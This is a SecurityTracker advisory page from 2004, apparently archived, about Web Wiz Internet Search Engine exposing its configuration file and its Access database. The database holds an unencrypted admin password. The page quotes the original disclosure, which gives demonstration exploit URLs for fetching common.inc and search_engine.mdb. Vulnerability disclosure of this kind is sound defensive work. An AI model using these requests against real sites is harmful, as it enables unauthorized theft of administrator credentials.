SecurityTracker: Web Wiz Internet Search Engine Discloses Database to Remote Users

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

Home | View Topics | Search | Contact Us |

SecurityTracker
Archives

Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Generic) > Web Wiz Internet Search Engine

Vendors: Web Wiz Guide

Web Wiz Internet Search Engine Discloses Database to Remote Users

SecurityTracker Alert ID: 1011421

SecurityTracker URL: http://securitytracker.com/id/1011421

CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)

Date: Sep 27 2004

Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information

Exploit Included: Yes

Description: Security .Net Information (snilabs) reported a vulnerability in Web Wiz Internet Search Engine. A remote user can access the database, which includes the administrative password.

It is reported that a remote user can access the 'common.inc' file to determine the path and filename for the database file. A remote user can then download the database.

Some demonstration exploit URLs are provided:

http://[target]/common.inc
http://[target]/search_engine.mdb

The administrator's unencrypted password is contained in the database file.

Impact: A remote user can obtain the database, including the administrative password.

Solution: No solution was available at the time of this entry.

Vendor URL: www.webwizguide.info/asp/sample_scripts/internet_search_engine_script.asp (Links to External Site)

Cause: Access control error, Configuration error

Underlying OS: Windows (Any)

Message History: None.

Source Message Contents

Date: Sun, 26 Sep 2004 04:45:35 -0300
Subject: Web Wiz Guide Internet Search Engine discloses database remote users


Security .Net Information (snilabs) Advisore:

Web Wiz Guide Internet Search Engine discloses database to remote users.
In the file common.inc (accesible to remote users) contain the path
and name of the database.
A remote user can download database containing admin password also
configuration.

common.inc:

<%
'****************************************************************************************
'**  Copyright Notice    
'**
'**  Web Wiz Guide Internet Search Engine
'**                                                              
'**  Copyright 2001-2002 Bruce Corkhill All Rights Reserved.          

......

'Database driver for Brinkster
'strCon = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" &
Server.MapPath("/USERNAME/db/search_engine.mdb") 'This one is for
Brinkster users place your Brinster username where you see USERNAME

'Alternative drivers faster than the basic one above
'strCon = "Provider=Microsoft.Jet.OLEDB.3.51; Data Source=" &
Server.MapPath("../search_engine.mdb") 'This one is if you convert the
database to Access 97
'strCon = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" &
Server.MapPath("../search_engine.mdb")  'This one is for Access
2000/2002
=====

xploit:

http://target.com/common.inc
http://target.com/search_engine.mdb

Database Administrator's password is not encrypted. heh..

Vendor contacted: not yet.. lol
-- 
Security .Net Information..
irc.xirc.org #sni-labs
Questions?... mail me

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us
Copyright 2012, SecurityGlobal.net LLC